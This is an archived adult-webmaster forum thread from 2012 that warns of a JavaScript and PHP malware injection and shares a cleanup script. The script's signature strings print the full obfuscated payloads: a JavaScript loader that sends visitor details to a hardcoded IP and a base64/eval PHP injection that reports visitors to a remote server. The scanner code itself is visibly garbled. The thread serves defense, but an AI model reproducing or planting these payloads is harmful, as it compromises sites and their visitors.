GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Better check your JS and PHP files [new malware injects] (https://gfy.com/showthread.php?t=1052856)

SZNY 01-09-2012 07:42 AM
Better check your JS and PHP files [new malware injects]
 
Just wanted to share this with you as it might affect your traffic. Funny thing is that Google doesn't report it yet as badware.

There is a new kind of JS malware virus that injects code to make 1pixel iframes and connects to certain sites.

I just scanned 150 domains and some of my WP installs where infected.

Here is a link from a German coder offering a workable solution. Copy the code in a php file and upload it to the root of your server.

Once done type www.xxxx.xx/filename.php to start scanning your files.

It also disinfects your code. Here the links:
http://forum.nexoneu.com/NXEU.aspx?g=posts&m=3143118
http://blog.insidecomp.com/?p=33#more-33


PHP Code:
<pre><!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>INSIDE Computer MalwareCheck 0.1</title>
</head>
<body>
<h1>Javascript und PHP Files werden auf Befall gecheckt:</h1>
 
<?php
echo '<h2>Startverzeichnis:'.getcwd().'</h2><br/>';
// dir_walk('/hp/ac/ab/vt/www/spd2011', 'showFiles');
$files_checked 0;
$files_infected 0;
echo '<table>';
dir_walk(getcwd(), 'checkFiles');
echo '</table>';
 
echo '<h2>Files checked: '.$files_checked.'<br/></h2>';
echo '<h2>Files infected: '.$files_infected.'<br/></h2>';
if ($files_infected == 0)
{
echo 'Alles im gr&uuml;nen Bereich...';
}
 
function dir_walk($start_dir$func) {
$entries scandir($start_dir);
foreach ($entries as $entry) {
if ($entry == '.' || $entry == '..') {
/* skip these */
} else if (is_dir($start_dir '/' .$entry)) {
echo '<tr><td><b>Scanning...'.$start_dir '/' $entry.'</b></td></tr>';
dir_walk($start_dir '/' $entry$func);
} else
$func($start_dir '/' $entry);
}
}
 
function checkFiles($filename) {
global $html_files;
 
// disindect javascriptFiles
if (strpos($filename'.js') === (strlen($filename) - 3))
{
echo '<tr><td>.js-File checking: '.$filename.'<td>';
$pattern='var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;';
disinfect($filename$pattern);
}
if (strpos($filename'.php') === (strlen($filename) - 4))
{
echo '<tr><td>.js-File checking: '.$filename.'<td>';
$pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
disinfect($filename$pattern);
}
 
}
function restore_hsc($val){
$val str_replace('&amp;''&'$val);
$val str_replace('&ouml;''?'$val);
$val str_replace('&auml;''?'$val);
$val str_replace('&uuml;''?'$val);
$val str_replace('&lt;''<'$val);
$val str_replace('&gt;''>'$val);
$val str_replace('&quot;''"'$val);
return $val;
}
 
function disinfect($filename$pattern) {
global $files_checked;
$files_checked++;
$pattern=trim(htmlspecialchars($pattern)); //prepare pattern
$lines file($filename);
$found=0;
for ($i=0$i<sizeof($lines); $i++) {
$current_line=trim(htmlspecialchars($lines[$i]));
if(strstr($current_line$pattern)) {
$lines[$i]=str_replace($pattern""htmlspecialchars(trim($lines[$i])));
$lines[$i]= preg_replace('/\s\s+/'' '$lines[$i]);
$lines[$i]=restore_hsc($lines[$i]);
$found++;
}
}
$lines array_values($lines);
if ($found >0) {
global $files_infected;
$files_infected++;
$file fopen($filename"w");
fwrite($fileimplode("\n",$lines));
fclose($file);
touch($file);
echo " <td><span style=\"color:red;\"> is infected. Cured: $found injected objects</span></td></tr>";
}
else {echo " <td><span style=\"color:green;\"> - File is clean</span></td></tr>";}
}
?>
</body>
</html>

nico-t 01-09-2012 08:06 AM
how will this virus affect your server? Will this cause load issues and eventually a mysql crash?

SZNY 01-09-2012 10:41 AM
Well it will cause extra load on your server (makes more connections) plus your sites are flagged as Malware by various AV software apps

pornguy 01-09-2012 10:53 AM
this is hitting Blogs or over all sites in general?


Can you find it by looking at the code of the index or is it hidden?

SZNY 01-09-2012 11:00 AM
Doesn't matter, all sites that are using JS files

pornguy 01-09-2012 11:04 AM
OK thanks

Damn.. More work.

raymor 01-09-2012 02:30 PM
Thanks, I'll add that signature to our scanner. I'll actually be interpreting and reducing the signature to catch other variations if the same thing. The posted code is awefully specific.

pimpware 01-09-2012 02:48 PM
Thanks for the heads up :thumbsup

All check and clean

blackmonsters 01-09-2012 04:25 PM
Cleaning up your files is good but that doesn't fix the problem.

How did that get into your site to begin with is the question.

SZNY 01-09-2012 04:31 PM
Quote:
Originally Posted by blackmonsters (Post 18679694)
Cleaning up your files is good but that doesn't fix the problem.

How did that get into your site to begin with is the question.
In my case I had some test domains which were not that secured and infected the rest of the server.

All is pretty closed now. Took me some time but all is cleaned and hope it can help others.

V_RocKs 01-09-2012 05:36 PM
crazy h4x0r5

Darkhorse 01-09-2012 06:01 PM
Thanks for this, will have to check mine out.

harvey 01-09-2012 07:07 PM
the cleaning code itself makes my antivirus goes bananas

FlorianPC 01-10-2012 01:16 AM
thanks for the code, i will check my domains too.

gabe100 01-10-2012 10:14 AM
If you don't think you're vulnerable read about my nightmare below. It's quite embarrassing. I don't post much. No one wants to write a story like this, hopefully it helps someone.

I was hit Thanksgiving day of last year. 12 years running adult sites and never a problem. In my case, the permissions on 1 php file within openx were wide open. Permissions don't sync across servers and malware was injected on my splash redirecting to a Russian site. Multiple shells were installed and if you have ever seen your backend/library via a shell with Russian headers and tags, it's the scariest thing ever.

Quite elegant too, all your folders and files are color coded, everything wide open.

The second scariest thing is looking at the code injected on to the page itself. In my case the code was 7 or 8 strange characters, you can't even see the redirect buried at the very bottom of the page. The page is straight HTML, a simple warning page. Super clean. The characters look like the innocent copyright tags.

That code referenced scripts buried far in my file structure.

Ad Words suspended, Banned from Google. Cybercat pulling me, TJ yanked me. Kenny emailing me, Paperstreet emailing me. Pornhub video b gone. Exo paused. NIGHTMARE!

That was my Thanksgiving.

The good part is it didn't last long. Once clean I resubmitted to google and within 5 seconds I was approved and it was like nothing ever happened. All references to us distributing malware within google search vanished.

What saved us was clonebox and Ray, having a great host and my man Konrad. The very early symptoms won't be apparent. First extremely vague warnings from Avast, then AVG then it gets wide out and the messages start rolling in from customers and partners. The nightmare really starts once you get banned from google. All paid SEO Gone, all organic SEO replaced with malware warnings.

Multiple servers on lockdown, thousands of folders each with perfect permissons set and yet 1 file wide open.

Looking back it's probably best it happened because other measures are now in place to ensure that never happens again.

Check your permissions and and at the very least, get a script installed that alerts you to any changes on your boxes. Having a firewall on your FTP/SSH isn't enough. These new malware injections are pretty clever.

Rather embarrassing, I had to learn the hard way. Hopefully you won't have to. :)


All times are GMT -7. The time now is 07:22 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc